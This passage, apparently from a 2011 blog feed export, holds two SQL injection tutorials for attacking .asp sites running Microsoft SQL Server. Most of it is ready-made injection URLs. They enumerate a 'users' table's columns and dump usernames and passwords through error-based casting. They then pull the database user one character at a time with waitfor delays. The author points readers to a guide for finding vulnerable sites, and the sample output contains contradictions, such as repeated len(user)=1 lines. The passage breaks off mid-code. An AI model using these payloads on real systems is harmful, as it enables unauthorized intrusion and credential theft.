='users')--&lt;br /&gt;look at the end where i filtered the table 'users'&lt;br /&gt;&lt;br /&gt;this is a fucking long query to keep in mind. il show the full one:&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=99) OR 1 IN(select top 1 cast (database_name_1..syscolumns.name as varchar(4096))from database_name_1..syscolumns, database_name_1..sysobjects WHERE database_name_1..syscolumns.id=database_name_1..sysobjects.id and database_name_1..sysobjects.name ='users')--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;execute this.&lt;br /&gt;now you will get an error saying the first column in table users.&lt;br /&gt;&lt;br /&gt;mine is 'username'.&lt;br /&gt;in some cases you get id or password or other stuff as the first one.&lt;br /&gt;but eventually you need to get all columns anyway so.&lt;br /&gt;we need to filter out the ones we have.&lt;br /&gt;i will filter out usernames and it will show the next one to me.&lt;br /&gt;we wil use the and name not in '..' again&lt;br /&gt;but we change name into database_name_1..syscolumns.name to prevent an unknown error.&lt;br /&gt;&lt;br /&gt;look at the end of the line watch closely.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;PEOPLE DO NOT FORGET TO WRITE DOWN IT WONT GET EASYER!!!! the database never likes us.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=99) OR 1 IN(select top 1 cast (database_name_1..syscolumns.name as varchar(4096))from database_name_1..syscolumns, database_name_1..sysobjects WHERE database_name_1..syscolumns.id=database_name_1..sysobjects.id and database_name_1..sysobjects.name ='users' AND database_name_1..syscolumns.name NOT IN('username'))--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;now we execute. and we geth the following column. exactly as we did in tables.&lt;br /&gt;&lt;br /&gt;lets say i got 'pass' now. to keep it god damn simple!&lt;br /&gt;this means when i put the word pass in the filter to we get an error because there are only to columns!&lt;br /&gt;&lt;br /&gt;so i found username and pass whitin the table users.&lt;br /&gt;now i want those names and passwords.&lt;br /&gt;&lt;br /&gt;take a sec. now look at the long god damn query you wrote.&lt;br /&gt;ant that awesome knowing what it means?&lt;br /&gt;lets move on!&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;using casting to collect data from columns&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;we wil use the castline yet again.&lt;br /&gt;but this time instead of selecting the db names and column stuff. we select the column calles username.&lt;br /&gt;selecting this from table users. and we want the id to be greater then 0 so: id&amp;gt; 0&lt;br /&gt;as following:&lt;br /&gt;&lt;br /&gt;OR 1 IN (select top 1 cast(username as varchar(4096)) from users WHERE id&amp;gt; 0)--&lt;br /&gt;&lt;br /&gt;full query:&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=99) OR 1 IN (select top 1 cast(username as varchar(4096)) from users WHERE id&amp;gt; 0)--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;now execute this line.&lt;br /&gt;you will get an error telling the first name whitin usernames.&lt;br /&gt;&lt;br /&gt;i get an error saying 'administrator' to keep it simple ;)&lt;br /&gt;&lt;br /&gt;to get the others change the id&amp;gt; 0 ti something else.&lt;br /&gt;for example id= 1&lt;br /&gt;if you get the same name again change id= 1 to id= 2&lt;br /&gt;and you will get another name for example 'heatcontroll'&lt;br /&gt;you keep doing this until you get an error which means you ren out of names whitin the column.&lt;br /&gt;&lt;br /&gt;Now we want the passwords.&lt;br /&gt;just edit the line. where usernames is i for example paste pass. because my other column was pass.&lt;br /&gt;&lt;br /&gt;OR 1 IN (select top 1 cast(pass as varchar(4096)) from users WHERE id&amp;gt; 0)--&lt;br /&gt;&lt;br /&gt;full query:&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=99) OR 1 IN (select top 1 cast(pass as varchar(4096)) from users WHERE id&amp;gt; 0)--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;and now execute this.&lt;br /&gt;you will get the first pass in row which is the one of admins.&lt;br /&gt;password: 123.&lt;br /&gt;&lt;br /&gt;when you change the id limit to the same we used for the name real steel which was id= 2&lt;br /&gt;we will for example get passwords: ABC&lt;/div&gt;&lt;span class="fullpost"&gt;  &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;copyright@2007 saifulfaizan&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23134681-3939977509932293715?l=www.saifulfaizan.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default/3939977509932293715'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default/3939977509932293715'/><link rel='alternate' type='text/html' href='http://www.saifulfaizan.com/2011/12/basic-error-sql-injection.html' title='Basic error sql injection'/><author><name>x-CODE-shadow</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_MmkIH6WGbYI/R4q6vasF8zI/AAAAAAAAAGY/x1TYR1MoOrE/S220/DSCI0128.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-23134681.post-8152607237958794066</id><published>2011-12-16T22:42:00.000+08:00</published><updated>2011-12-16T22:42:08.929+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Paper N Tutorial'/><title type='text'>Basic blind Sql Injection</title><content type='html'>&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;A vulnerable only to blind sql injection .asp webstite.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Notepad, to store data you collect while injecting.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;And loads of loads of spare time.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Finding vulnerable sites: --&lt;/span&gt;&lt;a href="http://www.skidforums.net/showthread.php?tid=1560167" style="-webkit-background-clip: padding-box; background-color: white; color: #308cff; font-family: sans-serif; font-size: 13px; line-height: 18px; outline-color: initial; outline-style: none; outline-width: initial; text-align: center; text-decoration: none;" target="_blank"&gt;Kobez expanding vulnerable collection guide!&lt;/a&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;--&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;The 2 kinds of time delay injection.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Integer injection:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.asp?id=1; waitfor delay '00:00:10'--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;So this line sais that satabase has to wait for 10 seconds before he responds.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;If the database returns directly, we know its false.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;If it waits 10 seconds its "true" obvious.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;String injection:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.asp?id=1'; waitfor delay '00:00:10'--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;same thing here only the quote came whit it ' as in basic sqli when u have a string injection.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Extracting the database username.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Wel. we have alot of work to do.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we need to find all characters. lets start whit one:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.asp?id=1; IF (len(user)=1) waitfor delay '00:00:10'--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Lets explain first. we ask: if (len(user)=1) so we ask is user has one character. waitfor delay '00:00:10'&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;database needs to wait 10 seconds to respond. but we all know in most cases a user is not 1 char.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we will encrease (len(user)=1) to (len(user)=2) and so on and so on.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.asp?id=1; IF (len(user)=1) waitfor delay '00:00:10'-- [no Delay from db.]&lt;br /&gt;www.[site].com/index.asp?id=1; IF (len(user)=2) waitfor delay '00:00:10'-- [no delay from db.]&lt;br /&gt;www.[site].com/index.asp?id=1; IF (len(user)=1) waitfor delay '00:00:10'-- [no delay from db.]&lt;br /&gt;www.[site].com/index.asp?id=1; IF (len(user)=1) waitfor delay '00:00:10'-- [page waites 10 seconds before it loads.]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we have a hit. database just told us by waiting 10 seconds that user has 4 characters.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;But what are the characters we seek? :/&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Get characters whit ascii and time delay.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;As we have seen in my previous tutorial. we are going to use ascii.&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;these will help us get the characters of the username.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;97 in ascii is the letter A we will encrease this count untill we get a hit.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;for example 97 A, 98 B, 99 C, and so on.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;how do we do this.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),1,1)))&amp;gt;97) waitfor delay '00:00:10'--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;what did i just say.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;if ascii (character&amp;nbsp;&lt;/span&gt;&lt;a href="" id="AdBriteInlineAd_code" name="AdBriteInlineAd_code" style="-webkit-background-clip: padding-box; background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-origin: initial; background-position: 50% 100%; background-repeat: repeat no-repeat; color: #006600; cursor: pointer; font-family: sans-serif; font-size: 13px; line-height: 18px; margin-bottom: -2px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 2px; text-align: center; text-decoration: none;" target="_top"&gt;code&lt;/a&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;) from user&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;1,1 (this means 1rst character) is 97 which is an A in ascii is correct. the database would wait 10 seconds befor ethe page loads.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;We need 4 character so the 1,1 needs to be encreased. if we want the second character we need to do 2,1.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;first character:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),1,1)))&amp;gt;97) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),1,1)))&amp;gt;98) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),1,1)))&amp;gt;99) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),1,1)))&amp;gt;100) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),1,1)))&amp;gt;101) waitfor delay '00:00:10'-- [10 second delay]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;the first character is a E. how do i know this:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;at 97 i had no delay which means its not an A&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;at 98 i had none either&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;not at 99, not at 100&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;but i did have a 10 second delay at 101. and 101 is E in achii char code.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;We need 4 more characters.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: 